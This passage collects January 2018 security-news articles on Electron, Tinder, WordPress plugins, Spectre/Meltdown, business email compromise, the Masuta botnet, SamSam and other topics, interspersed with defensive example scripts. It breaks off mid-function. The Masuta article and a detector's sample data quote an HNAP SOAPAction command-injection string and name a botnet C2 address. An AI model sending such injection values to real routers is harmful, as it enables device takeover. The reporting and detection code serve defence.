Carson doesn't believe that centralizing the effort against cybercrime will be effective. "Cybersecurity is most effective when we work together collectively but decentralized. Being decentralized in cybersecurity is a strength as it reduces the risk. We have had this discussion for many years in the EU about a European Centre for Cybersecurity though in the EU, it has been important to be working as a collective and at the same time, being decentralized."

Nevertheless, the potential of a WEF-backed global cybersecurity center cannot be denied. "The Global Centre for Cybersecurity could ultimately become an organization that fosters industry change and helps to educate the market and reduce the success cybercriminals are having on a daily basis," said Sam Curry, chief security officer at Cybereason.

The question is whether the WEF can deliver. "It is premature to declare victory," he continued; "and ultimately whether or not this works is dependent upon the collaboration of enterprises and a focused and determined group of leaders. It is clear to me that there will be minimal success if the organization is filled with toothless sinecures for washed up security hacks."


Code Execution Flaw Impacts Popular Desktop Apps
24.1.2018 securityweek
Vulnerability

A remote code execution vulnerability was addressed in the Electron framework, which powers highly popular desktop applications, including Slack, Skype, Signal, GitHub Desktop, Twitch, Wordpress.com, and others.

Created in 2013, the framework allows developers to use web technologies such as JavaScript, HTML, and CSS to develop native desktop applications. An open source project maintained by GitHub and an active community of contributors, Electron uses Chromium and Node.js and supports Windows, macOS, and Linux platforms.

There are over 460 cross-platform desktop applications using Electron, but only those that use custom protocol handlers are impacted by the vulnerability, and only applications built for Windows are affected by the bug. macOS and Linux are not vulnerable.

Tracked as CVE-2018-1000006, the flaw impacts Electron applications for Windows that register themselves as the default handler for a protocol, like myapp://.

According to Electron, these applications are vulnerable regardless of how the protocol is registered (using native code, the Windows registry, or Electron's app.setAsDefaultProtocolClient API).

The vulnerability was addressed with the release of electron v1.8.2-beta.4, electron v1.7.11, and electron v1.6.16. All three releases are available for download on GitHub.

“If for some reason you are unable to upgrade your Electron version, you can append “--” as the last argument when calling app.setAsDefaultProtocolClient, which prevents Chromium from parsing further options. The double dash “--” signifies the end of command options, after which only positional parameters are accepted,” Electron explains.

Although only Windows applications that register themselves as handlers are affected by the remote code vulnerability, all Electron developers are advised to update their software to the latest stable version as soon as possible.


Are you a Tinder user? Watch out, someone could spy on you
24.1.2018 securityaffairs
Social

Experts at security firm Checkmarx discovered two security vulnerabilities in the Tinder mobile apps that could be exploited to spy on users.
Security experts at Checkmarx discovered two security vulnerabilities in the Tinder Android and iOS dating applications that could be exploited by an attacker on the same Wi-Fi network as a target to spy on users and modify their content.

Attackers can view a target user’s Tinder profile, see the profile images they view and determine the actions they take.

“The vulnerabilities, found in both the app’s Android and iOS versions, allow an attacker using the same network as the user to monitor the user’s every move on the app. It is also possible for an attacker to take control over the profile pictures the user sees, swapping them for inappropriate content, rogue advertising or other type of malicious content (as demonstrated in the research).” reads the analysis published by Checkmarx.

“While no credential theft and no immediate financial impact are involved in this process, an attacker targeting a vulnerable user can blackmail the victim, threatening to expose highly private information from the user’s Tinder profile and actions in the app.”

An attacker can conduct many other malicious activities, including intercepting traffic and launching DNS poisoning attacks.

The first issue is that both the iOS and Android Tinder apps download profile pictures over insecure HTTP connections, which means that an attacker with access to the traffic can determine which profiles a Tinder user is viewing.

An attacker could also modify traffic for example to swap images.

“Attackers can easily discover what device is viewing which profiles,” continues the analysis. “Furthermore, if the user stays online long enough, or if the app initializes while on the vulnerable network, the attacker can identify and explore the user’s profile. Profile images that the victim sees can be swapped, rogue advertising can be placed and malicious content can be injected.”

Such an issue could be mitigated by adopting HTTPS.

Checkmarx also discovered another issue related to the use of HTTPS, the flaw was called “Predictable HTTPS Response Size”.

“By carefully analyzing the traffic coming from the client to the API server and correlating with the HTTP image requests traffic, it is possible for an attacker to determine not only which image the user is seeing on Tinder, but also which action did the user take.” states Checkmarx. “This is done by checking the API server’s encrypted response payload size to determine the action.”

An attacker in a position to analyze the traffic can discover the user’s interest in a specific profile: when the user swipes left on a profile picture, the API server delivers a 278-byte encrypted response. Swiping right, meaning the Tinder user likes a particular profile, generates a 374-byte response instead.

The researchers also noticed that Tinder member pictures are downloaded to the app over an HTTP connection, which makes it possible for an attacker to view the profile images of the users being swiped left and right.

In order to mitigate this issue, the researchers suggest padding: if the responses were padded to a fixed size, it would be impossible to distinguish the user’s actions by their length.
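The padding mitigation described above, as an added example for this article (it is not Tinder's or Checkmarx's code): the two sample responses are constructed dummies whose only meaningful property is their length, 278 and 374 bytes as reported, and the 512-byte padding granularity is an assumption.

```python
"""Fixed-size padding for API responses whose length would otherwise reveal the action.

Added example for this article, not Tinder's or Checkmarx's code. Encryption preserves
plaintext length (plus a constant), so padding before encryption is what equalises the
sizes a passive observer can measure.
"""
import struct

BLOCK = 512  # assumed padding granularity; every response is rounded up to a multiple


def pad_response(body: bytes, block: int = BLOCK) -> bytes:
    """Frame the body with a 4-byte length and zero-pad to a multiple of `block`."""
    framed = struct.pack(">I", len(body)) + body
    remainder = len(framed) % block
    if remainder:
        framed += b"\x00" * (block - remainder)
    return framed


def unpad_response(padded: bytes) -> bytes:
    """Recover the original body on the client using the length prefix."""
    (length,) = struct.unpack(">I", padded[:4])
    return padded[4:4 + length]


# Constructed stand-ins for the two API replies; the bytes are dummies, lengths matter.
LEFT_SWIPE = b"L" * 278
RIGHT_SWIPE = b"R" * 374


def observable_lengths(responses) -> list:
    """What a passive observer learns: the size of each response (the constant TLS
    overhead is ignored here because it does not change the comparison)."""
    return [len(r) for r in responses]


def lengths_leak_action(responses) -> bool:
    """True when responses differ in size, i.e. size alone tells the actions apart."""
    return len(set(observable_lengths(responses))) > 1


if __name__ == "__main__":
    raw = [LEFT_SWIPE, RIGHT_SWIPE]
    print("unpadded:", observable_lengths(raw), "leaks:", lengths_leak_action(raw))
    padded = [pad_response(r) for r in raw]
    print("padded:  ", observable_lengths(padded), "leaks:", lengths_leak_action(padded))
```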

Checkmarx disclosed both vulnerabilities to Tinder.


WordPress plugins and themes vulnerabilities statistics for 2017
24.1.2018 securityaffairs
Vulnerability

WordPress plugins and themes vulnerabilities statistics for 2017. The statistics were derived from our up-to-date WordPress Vulnerabilities Database. We are monitoring a large number of sources to add new vulnerabilities to the database on a daily basis.
The year in figures
We added 221 vulnerabilities to our database. The total number of vulnerabilities decreased by 69%. During 2017, just like in 2016, Cross-Site Scripting (XSS) has been at the top of the list. More and more WordPress plugins and themes are found to be vulnerable to Cross-Site Scripting (XSS). This is because many developers do not pay enough attention to escaping data output.

2017 has also seen a substantial rise in SQL Injection vulnerabilities. It’s surprising how many sites were put in danger by vulnerabilities found in WordPress plugins. The total number of active installs is 17,101,300+.

Total vulnerable plugins – 202
Total vulnerable themes – 5
Plugins affected by vulnerabilities in WordPress.org repository – 153
Non-WordPress.org repository plugins affected by vulnerabilities – 24

WordPress top 3 vulnerabilities
Cross-Site Scripting (XSS)
SQL Injection (SQLi)
Broken Access Control
Plugins by vulnerability type
XSS (Cross-Site Scripting) – 71
SQL Injection – 40
Unrestricted Access – 20
Cross Site Request Forgery (CSRF) – 12
Multi – 10
Information Disclosure – 10
Arbitrary File Upload – 7
BYPASS – 7
Arbitrary File Download – 7
PHP Object Injection – 5
Remote File Inclusion – 3
Local File Inclusion – 3
Arbitrary Code Execution – 2
Direct static code injection – 1
Directory Traversal – 1
Top 5 most popular plugins affected by vulnerabilities in 2017
Yoast SEO (most popular SEO plugin) – 5,000,000+ – XSS (Cross-site Scripting)
WooCommerce (most popular ecommerce plugin) – 3,000,000+ – XSS (Cross-site Scripting)
Smush Image Compression and Optimization – 1,000,000+ – Directory Traversal
Duplicator – 1,000,000+ – XSS (Cross-site Scripting)
Loginizer – 600,000+ – SQL Injection
Some interesting facts
WordPress released 8 security updates in 2017.
The total number of vulnerabilities in the ThreatPress vulnerabilities database is 3321.
The first vulnerability was discovered on 2005-02-20.


Intel recommended to stop deploying the current versions of Spectre/Meltdown patches
24.1.2018 securityaffairs
Vulnerability

Intel recommended OEMs, cloud service providers, system manufacturers, software vendors as well as end users to stop deploying the current versions of Spectre/Meltdown patches.
While Linux creator Linus Torvalds calls the Spectre updates “utter garbage”, Intel is warning users to stop installing the current versions of the Spectre/Meltdown patches.

Intel explained its approach in its technical note about Spectre mitigation (“Speculative Execution Side Channel Mitigations”): the tech giant addressed the issue with an opt-in flag dubbed the IBRS_ALL bit (IBRS stands for Indirect Branch Restricted Speculation).

Indirect Branch Restricted Speculation, along with Single Thread Indirect Branch Predictors (STIBP) and Indirect Branch Predictor Barrier (IBPB), prevents the abuse of the branch prediction feature and thus the exploitation of the flaw.

Torvalds speculates that Intel’s decision to address the issues in this way is mainly motivated by the intention to avoid legal liability: recalling two decades of flawed chips would have a catastrophic impact on the tech giant.

Torvalds explained that the impact of using IBRS on existing hardware is so severe that no one will set the hardware capability bits.

Users and IT companies are reporting severe problems after installing the patches, such as a significant degradation of performance and unwanted reboots.

Intel has recommended that OEMs, cloud service providers, system manufacturers, software vendors and end users stop deploying the current versions of the Spectre/Meltdown patches. The company announced that it has found the root cause of the reboot issues on Broadwell and Haswell platforms and is asking customers to wait for a fix.

The tech giant began rolling out to industry partners a beta update to address the issue.

“As we start the week, I want to provide an update on the reboot issues we reported Jan. 11. We have now identified the root cause for Broadwell and Haswell platforms, and made good progress in developing a solution to address it,” Intel said in a press release published on Monday. “Over the weekend, we began rolling out an early version of the updated solution to industry partners for testing, and we will make a final release available once that testing has been completed.”

Let’s hope Intel will release new Spectre/Meltdown patches soon


According to TrendMicro Business Email Compromise (BEC) attacks could reach $ 9 billion in 2018
24.1.2018 securityaffairs
Spam

According to a report published by the security firm TrendMicro, Business Email Compromise (BEC) attacks could reach $ 9 billion in 2018.
The report highlights the growth of the damage caused by hackers who adopt new attack vectors and techniques, like the ones recently used by the Lebanese intelligence agency Dark Caracal.

According to a report published by TrendMicro, losses caused by Business Email Compromise (BEC) attacks have surpassed those of past years, and it is estimated that they could reach $9 billion in 2018. This rising figure takes into account new attack vectors like the malware used by the Lebanese intelligence agency Dark Caracal, which is delivered through Android applications.

The report states that the FBI released a public announcement revealing that BEC attacks had become a $5.3 billion industry in recent years. In that regard, the report emphasizes that hackers employ social engineering to lure and deceive employees in a myriad of scams that bypass security measures. By exploiting a deep understanding of human psychology, hackers circumvent the defenses; as the report states, BEC “requires little in the way of special tools or technical knowledge to pull off, instead requiring an understanding of human psychology and knowledge of how specific organizations work.”

The report lists how BEC attacks are usually conducted. The techniques are: bogus invoice scheme, CEO fraud, account compromise, attorney impersonation and data theft. The report highlights that these attacks fall into two major groups: credential grabbing and email-only.

Image: Business Email Compromise

The credential-grabbing technique, as detailed by the report, has shown an increase in phishing HTML pages sent as spam attachments. Hackers also target organizations with malware campaigns; one recent example is Zyklon, which exploits flaws in Microsoft Office. The charts in the report show that these attacks doubled between January and September 2017.

According to the researchers, the two main types of malware employed are keyloggers and Remote Access Tools (RATs). Since these tools are cheap and effective, they can harvest all the credentials on any infected machine. Such malware is hard for anti-virus to detect since it is widely shared on forums or embedded in applications commonly used on a daily basis. The report lists the most common malware used in Business Email Compromise attacks: AgentTesla, CyborgLogger, DarkComet, DiamondFox, Dracula Logger, iSpy Keylogger, Knight Logger and Luminosity Link.

The report also suggests how to defend against BEC attacks: employee awareness and education, verifying received emails, verifying the legitimacy of executive requests, verifying requests from vendors and suppliers, verifying any request, and adopting a security culture within the organization.

Sources:

https://www.ic3.gov/media/2017/170504.aspx

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/business-email-compromise-bec-schemes

https://www.trendmicro.com/vinfo/us/security/research-and-analysis/predictions/2018

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/delving-into-the-world-of-business-email-compromise-bec

https://irishinfosecnews.wordpress.com/2018/01/18/bec-attacks-to-exceed-9b-in-2018-trend-micro/

https://www.infosecurity-magazine.com/news/new-attack-group-fires-rats-and/

https://threatpost.com/new-dridex-variant-emerges-with-an-ftp-twist/129546/

http://mashable.com/2018/01/19/dark-caracal-hackers-phish-whatsapp-and-facebook-accounts/#1p4UuGZVVSqx

https://www.darkreading.com/vulnerabilities—threats/bec-attacks-to-exceed-$9b-in-2018-trend-micro/d/d-id/1330853

https://www.csoonline.com/article/3247670/email/email-security-in-2018.html

http://www.informationsecuritybuzz.com/expert-comments/business-email-compromise-attacks-exceed-9b-2018-ironscales/

https://in.reuters.com/article/us-lebanon-cyber/lebanese-security-agency-turns-smartphone-into-selfie-spycam-researchers-idINKBN1F726S

https://www.forbes.com/sites/thomasbrewster/2018/01/18/lebanon-surveillance-hits-google-android-lookout-eff/#19ad8aef7971

http://www.computerweekly.com/news/252433527/Powerful-Zyklon-malware-exploiting-MS-Office-flaws


Satori’s threat actors are behind the new Masuta botnet that is targeting routers in the wild
24.1.2018 securityaffairs BotNet

The Masuta botnet targets routers using default credentials; one of the versions analyzed, dubbed “PureMasuta”, relies on the old D-Link Home Network Administration Protocol exploit (EDB 38722).
Security experts at NewSky believe the operators of the recently discovered Satori botnet are launching a new massive hacking campaign against routers, infecting them and recruiting them into a botnet dubbed Masuta.

“We analyzed two variants of an IoT botnet named “Masuta” where we observed the involvement of a well-known IoT threat actor and discovered a router exploit being weaponized for the first time in a botnet campaign.” reads the analysis published by NewSky.

“We were able to get hands on the source code of Masuta (Japanese for “master”) botnet in an invite only dark forum. After analyzing the configuration file, we saw that Masuta uses 0xdedeffba instead of Mirai’s 0xdeadbeef as the seed of the cipher key, hence the strings in the configuration files were effectively xored by ((DE^DE)^FF) ^BA or 0x45.”
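The key derivation the NewSky quote describes, as an added analyst example (not code from NewSky or from the botnet): Mirai's table.c splits the 32-bit seed into four bytes and XORs every config byte with all four, which collapses to a single key byte, so Masuta's seed 0xdedeffba gives ((DE^DE)^FF)^BA = 0x45. The obfuscated sample entry below is constructed for the example, not taken from a real sample.

```python
"""Decode Mirai-family configuration strings obfuscated with the seed-derived XOR key."""
from typing import List, Tuple

MIRAI_SEED = 0xDEADBEEF    # Mirai's published seed, effective key 0x22
MASUTA_SEED = 0xDEDEFFBA   # Masuta's seed per NewSky, effective key 0x45


def xor_key_from_seed(seed: int) -> int:
    """Collapse the four seed bytes into the effective single-byte key,
    exactly as Mirai's toggle_obf() applies k1..k4 in sequence."""
    k1 = seed & 0xFF
    k2 = (seed >> 8) & 0xFF
    k3 = (seed >> 16) & 0xFF
    k4 = (seed >> 24) & 0xFF
    return k1 ^ k2 ^ k3 ^ k4


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR is its own inverse, so this both obfuscates and deobfuscates."""
    return bytes(b ^ key for b in data)


def decode_entry(blob: bytes, seed: int) -> str:
    """Decode one NUL-terminated table entry using the bot's seed."""
    plain = xor_bytes(blob, xor_key_from_seed(seed))
    return plain.split(b"\x00", 1)[0].decode("ascii", errors="replace")


def recover_key(blob: bytes) -> List[Tuple[int, str]]:
    """When the seed is unknown, try all 256 keys and keep those whose
    output is printable ASCII up to the first NUL; this is how an analyst
    finds the 0x45 without having the source."""
    hits = []
    for key in range(256):
        plain = xor_bytes(blob, key).split(b"\x00", 1)[0]
        if plain and all(0x20 <= b < 0x7F for b in plain):
            hits.append((key, plain.decode("ascii")))
    return hits


# Constructed sample: a C2 hostname entry as it would sit in the bot's
# table, obfuscated with the Masuta key. Not a real indicator.
SAMPLE_HOST = b"c2.example.invalid"
SAMPLE_BLOB = xor_bytes(SAMPLE_HOST + b"\x00", xor_key_from_seed(MASUTA_SEED))


if __name__ == "__main__":
    print(f"Mirai key 0x{xor_key_from_seed(MIRAI_SEED):02x}, "
          f"Masuta key 0x{xor_key_from_seed(MASUTA_SEED):02x}")
    print("decoded:", decode_entry(SAMPLE_BLOB, MASUTA_SEED))
    for key, text in recover_key(SAMPLE_BLOB):
        print(f"candidate key 0x{key:02x}: {text}")
```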

The Satori botnet is a variant of the Mirai botnet, which was first discovered by the MalwareMustDie group of experts; it made the headlines at the end of 2016 when it was involved in hundreds of thousands of attempts to exploit a recently discovered vulnerability in Huawei HG532 home routers.

Masuta also targets routers using default credentials; one of the versions analyzed by the experts, dubbed “PureMasuta”, relies on the old D-Link Home Network Administration Protocol exploit (EDB 38722).

Researchers noticed a rise in Masuta attacks since September: their honeypots observed 2,400 IPs involved in the botnet over the last three months, and the experts believe that more routers will be recruited in the coming months.

Image: Masuta botnet

The flaw exploited by EDB 38722 was discovered in 2015 by researcher Craig Heffner; it affects D-Link’s Home Network Administration Protocol.

“The weaponized bug introduced in PureMasuta botnet is in the HNAP (Home Network Administration Protocol) which itself is based on the SOAP protocol.” continues the analysis published by NewSky.

“It is possible to craft a SOAP query which can bypass authentication by using hxxp://purenetworks.com/HNAP1/GetDeviceSettings. Also, it is feasible to run system commands (leading to arbitrary code execution) because of improper string handling. When both issues are combined, one can form a SOAP request which first bypasses authentication, and then causes arbitrary code execution.”

The experts explained that a string like the following will cause a reboot.

SOAPAction: “hxxp://purenetworks.com/HNAP1/GetDeviceSettings/`reboot`”
An attacker can run any command inserted after ‘GetDeviceSettings’; the PureMasuta bot uses this mechanism to run a wget that fetches and runs a shell script to take over the target router.
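A detection for the HNAP injection pattern described above, as an added example (not NewSky's code): a legitimate HNAP SOAPAction is "http://purenetworks.com/HNAP1/<ActionName>" with a bare identifier as the action, so anything appended after it (backticks, other shell metacharacters, an extra path segment) can be flagged at a proxy, honeypot or IDS. The captured requests below are constructed, with the article's hxxp written as http.

```python
"""Flag HNAP SOAPAction headers carrying command injection (EDB 38722 pattern)."""
import re
from typing import Dict, List

HNAP_ACTION = re.compile(r"^https?://purenetworks\.com/HNAP1/[A-Za-z0-9_]+$")
SHELL_META = re.compile(r"[`$;|&<>\s]")   # characters a shell would act on


def soapaction_verdict(value: str) -> str:
    """Classify one SOAPAction value: "ok", "injection" or "malformed"."""
    v = value.strip().strip('"')
    if HNAP_ACTION.match(v):
        return "ok"
    if "/HNAP1/" in v and SHELL_META.search(v.split("/HNAP1/", 1)[1]):
        return "injection"
    return "malformed"


def parse_request(raw: str) -> Dict[str, str]:
    """Minimal HTTP request-head parser; header names are lower-cased and
    the request line is kept under "_request"."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {"_request": lines[0]}
    for line in lines[1:]:
        if ":" in line:
            name, val = line.split(":", 1)
            headers[name.strip().lower()] = val.strip()
    return headers


def scan_requests(raw_requests: List[str]) -> List[Dict[str, str]]:
    """Report every request that carries a SOAPAction, with its verdict."""
    findings = []
    for raw in raw_requests:
        h = parse_request(raw)
        if "soapaction" in h:
            findings.append({"request": h["_request"],
                             "soapaction": h["soapaction"],
                             "verdict": soapaction_verdict(h["soapaction"])})
    return findings


# Constructed captures: a benign HNAP query, the reboot injection the
# article quotes, and a malformed action carrying an extra path segment.
SAMPLE_REQUESTS = [
    "POST /HNAP1/ HTTP/1.1\r\nHost: 192.0.2.1\r\n"
    "SOAPAction: \"http://purenetworks.com/HNAP1/GetDeviceSettings\"\r\n\r\n",
    "POST /HNAP1/ HTTP/1.1\r\nHost: 192.0.2.1\r\n"
    "SOAPAction: \"http://purenetworks.com/HNAP1/GetDeviceSettings/`reboot`\"\r\n\r\n",
    "POST /HNAP1/ HTTP/1.1\r\nHost: 192.0.2.1\r\n"
    "SOAPAction: \"http://purenetworks.com/HNAP1/GetDeviceSettings/extra\"\r\n\r\n",
]


if __name__ == "__main__":
    for f in scan_requests(SAMPLE_REQUESTS):
        print(f"{f['verdict']:10} {f['soapaction']}")
```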

The experts noticed that the command and control server (93.174.93.63) used by the PureMasuta variant is the same one used by the original Masuta variants, which means that PureMasuta is an evolution of the botnet operated by the same threat actors.

NewSky attributes the Masuta botnet to an entity dubbed “Nexus Zeta”; the name comes from the C&C URL nexusiotsolutions(dot)net, which is the same one used by the Satori botnet.


Bell Canada suffers a data breach for the second time in less than a year
24.1.2018 securityaffairs Incident

Bell Canada is notifying customers about a data breach that exposed personal data of roughly 100,000 individuals, this is the second security breach in a few months.
Bell Canada is notifying customers about a data breach that exposed personal data of roughly 100,000 individuals, including names, phone numbers, email addresses, usernames and account numbers.

“The protection of consumer and corporate information is of primary importance to Bell,” John Watson, Executive Vice-President of Customer Experience at Bell Canada, told customers. “We work closely with the RCMP and other law enforcement agencies, government bodies and the broader technology industry to combat the growth of cyber crimes.”

The Royal Canadian Mounted Police has launched an investigation into the security breach at Bell Canada.

“We are following up with Bell to obtain information regarding what took place and what they are doing to mitigate the situation, and to determine follow up actions,” said the federal privacy watchdog’s spokeswoman Tobi Cohen.

Bell added that there is no evidence that financial data (i.e. credit card data) has been compromised.

Image: Bell Canada

This is the second time that Bell Canada has been the victim of a data breach: in May 2017 an anonymous hacker obtained access to about 1.9 million active email addresses and about 1,700 customer names and active phone numbers.

As part of its incident response procedure, Bell confirmed that it has implemented additional security measures for account authentication.

Bell Canada advised users to monitor their financial and online accounts for unauthorized activity and recommends that customers use strong passwords and change them frequently.

The Canadian Government plans to review the Personal Information Protection and Electronic Documents Act, which would require companies to report data breaches.

Unfortunately, until now only the province of Alberta has mandatory reporting requirements for private-sector companies that suffer a data breach.


Less than 10% of Gmail users enabled two-factor authentication
24.1.2018 securityaffairs Safety

According to Google software engineer Grzegorz Milka, less than 10 percent of its users have enabled two-factor authentication (2FA) for their accounts.
The availability of billions of credentials in the criminal underground, due to the numerous massive data breaches of recent years, makes it easy for crooks to take over users’ accounts.

We always suggest enabling two-factor authentication to improve the security of our accounts; unfortunately, the suggestion is often ignored.

“Even if someone else gets your password, it won’t be enough to sign in to your account,” states Google’s page on 2FA.

Considering that Google has more than 2 billion monthly active devices, the number of exposed accounts is huge.

Milka made the disconcerting revelation at Usenix’s Enigma 2018 conference. Google’s two-factor authentication (2FA) lets users access their account by providing their login credentials along with an authentication code sent to the user via SMS or voice call, or generated by the Google mobile app.

Image: Two-factor authentication. Source: The Register

This data demonstrates the lack of awareness of cyber threats and of the ways to mitigate them.

Many users believe that configuring and using 2FA for their accounts would make their experience worse.

The Register asked Milka why Google didn’t just make two-factor mandatory across all accounts and received the following answer:

“The answer is usability,” he replied. “It’s about how many people would we drive out if we force them to use additional security.”

Contrary to what you might think, it is very easy to enable 2FA for your account; Google has published a step-by-step guide.

The risk of identity theft increases when users share the same credentials among many web services.

Milka also cited a 2016 Pew study saying that only 12 percent of Americans use a password manager.

On the other hand, Google is working to improve both user experience and security, for example by employing machine learning systems that are able to spot suspicious activities on accounts.

For example, when an attacker gets access to an account, he usually shuts down notifications to the legitimate owner and starts exploring the content of the mailbox, searching for passwords, license and activation codes, cryptocurrency wallet addresses and credentials, intimate photos, and other sensitive documents, including copies of ID cards.

When Google detects one of the above actions, it immediately triggers mitigation countermeasures.


SamSam Operators Make $325,000 in 4 Weeks
23.1.2018 securityweek
Ransomware

Numerous SamSam attacks over the past month or so have paid off for the ransomware’s operators, who made over $325,000 in a short period of time, security researchers with Cisco Talos say.

Starting last month, the malware began targeting organizations across multiple industries including government, healthcare and ICS in a series of attacks that appear to be rather opportunistic in nature. The impact, however, was wider, especially in the healthcare sector, where patients were affected too, not just the hit organizations.

On January 11, the ransomware hit Hancock Health, headquartered in Greenfield, Indiana, a hospital that ended up paying $55,000 to regain access to its files. Adams Memorial Hospital in Decatur, Indiana, and Allscripts, a major electronic health record (EHR) company headquartered in Chicago, IL (which confirmed to SecurityWeek that roughly 1,500 clients were impacted), were also hit by SamSam.

Other organizations were impacted as well, yet the security researchers still haven’t figured out which infection vector the attackers used. Previously, SamSam operators compromised a machine within the network and then moved laterally to inject code and execute the ransomware.

In a report released in March last year, Javelin Networks explained that SamSam’s operators have been using stolen domain credentials to gain access to a host, then leveraging Active Directory for reconnaissance purposes, and later moving laterally through the network.

In 2016, SamSam was observed targeting vulnerable JBoss hosts, and Cisco believes that compromised RDP/VNC servers might have been used in the recent wave of attacks, allowing SamSam operators to obtain an initial foothold.

As part of the new attacks, string obfuscation and improved anti-analysis techniques were employed. The attackers used a loader to decrypt and execute an encrypted ransomware payload, a mechanism they have been employing since at least October 2017.

The loader, a simple .NET assembly with no obfuscation, searches for files with the extension .stubbin in its execution directory, as these contain SamSam’s encrypted payload. The loader appears derived from an example posted on the Codeproject.com website.

The ransomware operators are believed to be deploying the malware manually. They also use symmetric encryption keys that are randomly generated for each file.

The actor behind the attacks was highly focused on preventing the forensic recovery of the malware sample itself and didn’t simply rely on obfuscating the running malware code. To reduce the chances of obtaining the payload for analysis, the password necessary for the loader to decrypt the payload is passed as a parameter.

Analysis of the code didn’t reveal an automated mechanism for contacting the Tor address hardcoded in the malware, and Cisco believes that victim identification with the associated RSA private key is done manually or using another tool.

“The Tor onion service and the Bitcoin wallet address are hardcoded into the payload whilst the public key is stored in an external file with the extension .keyxml,” Cisco explains.

The wallet employed in this campaign was used for multiple victims, and the security researchers discovered that the first payment into the wallet was received on December 25, 2017. However, there is a chance that other Bitcoin wallets are also used.

The Bitcoin wallet address received approximately 30.4 Bitcoin at the time of analysis, meaning that the SamSam operators made over $325,217.07 since December 25. Within its first year of operation, between 2015 and 2016, SamSam is believed to have made its operators $450,000 richer.

One thing that SamSam victims should keep in mind, however, is that the ransomware does not delete Volume Shadow Copies. It works by creating an encrypted version of the targeted file and then deleting the original using the regular Windows API.

“Although unlikely, due to block overwriting, recovery of the original files from the versions of affected folders saved by the operating system may be possible,” Cisco says.


HP, Dell Halt BIOS Updates Over Buggy CPU Patches
23.1.2018 securityweek
Vulnerability

Dell, HP and other system manufacturers have advised customers not to install the recent BIOS updates designed to address the Spectre and Meltdown CPU vulnerabilities due to unstable code delivered by Intel.

The Spectre and Meltdown vulnerabilities, which allow malicious applications to bypass memory isolation mechanisms and access sensitive data, were disclosed on January 3, one week before initially planned. As a result, vendors rushed to roll out patches and many of them turned out to be unstable.

Both software and firmware patches have caused problems. On Monday, Intel told users to stop deploying microcode updates that fix Spectre and Meltdown until it addresses issues that led to reboots and other unpredictable system behavior.

Intel initially said only systems running Broadwell and Haswell CPUs experienced more frequent reboots, but similar behavior was later observed on Ivy Bridge-, Sandy Bridge-, Skylake-, and Kaby Lake-based platforms as well.

The company now says it has identified the root cause of the reboot issue and is “making good progress in developing a solution to address it.” In the meantime, it has advised OEMs, system manufacturers, software vendors, and cloud service providers to stop deploying current versions.

Following Intel’s announcement, Dell told customers not to deploy the BIOS updates designed to address one of the Spectre vulnerabilities, specifically CVE-2017-5715, which is known as “Variant 2.”

“Dell is advising that all customers should not deploy the BIOS update for the Spectre (Variant 2) vulnerability at this time. We have removed the impacted BIOS updates from our support pages and are working with Intel on a new BIOS update that will include new microcode from Intel,” the company said.

Dell told users who have already deployed the BIOS updates to revert to a previous version until the issue has been resolved.

HP has also removed BIOS softpaqs from its website and expects to reissue updates with the previous Intel microcode starting January 25.

Lenovo informed customers that it has pulled UEFI firmware updates for systems with Intel Broadwell and Haswell processors.

VMware has also decided to delay new releases of microcode updates until Intel addresses these problems.

Some systems running Red Hat and Ubuntu operating systems failed to boot after Spectre and Meltdown patches were installed.

The Meltdown attack relies on one vulnerability, tracked as CVE-2017-5754, but there are two main variants of the Spectre attack, including CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2).

Meltdown and Variant 1 of Spectre can be patched efficiently with software updates, but Variant 2 requires microcode updates for a complete fix. While some software updates have also been known to cause problems, vendors have still advised users to deploy them in order to protect their systems against potential attacks.

“The current unstable code for the Spectre and Meltdown CPU patches leaves end users vulnerable with no available options other than to wait for a stable fix. In times like these, customers should be extra vigilant to ensure they have not been compromised. Network traffic analytics should be used to monitor their environment for anomalous traffic patterns and unusual behaviors,” Bob Noel, Director of Strategic Relationships and Marketing for Plixer, told SecurityWeek.

“The secondary problem this unstable patch code creates is a general hesitancy for end users to quickly apply future patches. Early adopters of these patches experienced hardware reboots and downtime, which is likely to leave them wary of becoming early adopters for future patches,” Noel added.
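With firmware updates being pulled and reverted, administrators want to know which of the mitigations discussed in this article and in the Intel advisory above (IBRS, IBPB, STIBP for Variant 2; PTI for Meltdown) a host actually has in effect. The following is an added example, not from the article or any vendor: it parses the per-issue status lines that Linux kernels from 4.15 onward expose under /sys/devices/system/cpu/vulnerabilities/ ("Not affected", "Vulnerable[: ...]" or "Mitigation: <list>") and reports whether spectre_v2 still lacks any microcode-backed feature. The sample status lines are constructed in the kernel's format so the parser runs on any host.

```python
"""Report which Spectre/Meltdown mitigations a Linux kernel says are active."""
import os
import re
from dataclasses import dataclass, field
from typing import Dict, List

SYSFS_DIR = "/sys/devices/system/cpu/vulnerabilities"

# Features that need the CPU microcode (firmware/BIOS) side of the fix.
MICROCODE_FEATURES = ("IBRS", "IBPB", "STIBP")


@dataclass
class Status:
    issue: str
    state: str                      # "not-affected", "vulnerable", "mitigated"
    detail: str = ""                # text after "Mitigation:" / "Vulnerable:"
    features: Dict[str, bool] = field(default_factory=dict)  # IBRS/IBPB/STIBP in use?


def parse_status(issue: str, line: str) -> Status:
    """Parse one sysfs vulnerability line into a Status."""
    text = line.strip()
    if text == "Not affected":
        return Status(issue, "not-affected")
    if text.startswith("Vulnerable"):
        return Status(issue, "vulnerable", text[len("Vulnerable"):].lstrip(": "))
    if text.startswith("Mitigation:"):
        detail = text[len("Mitigation:"):].strip()
        feats = {}
        for name in MICROCODE_FEATURES:
            # "STIBP: disabled" means known but not in use; a bare name,
            # "IBRS_FW" or "IBPB: conditional" means the feature is in use.
            m = re.search(r"\b" + name + r"(?:_FW)?(?::\s*(\w+))?", detail)
            feats[name] = bool(m) and (m.group(1) or "").lower() not in ("disabled", "off")
        return Status(issue, "mitigated", detail, feats)
    raise ValueError(f"unrecognised status for {issue}: {line!r}")


def read_sysfs(directory: str = SYSFS_DIR) -> List[Status]:
    """Read every vulnerability file on the running host (Linux >= 4.15)."""
    results = []
    for name in sorted(os.listdir(directory)):
        with open(os.path.join(directory, name)) as fh:
            results.append(parse_status(name, fh.read()))
    return results


def variant2_needs_microcode(statuses: List[Status]) -> bool:
    """True when spectre_v2 (Variant 2, CVE-2017-5715) is reported vulnerable
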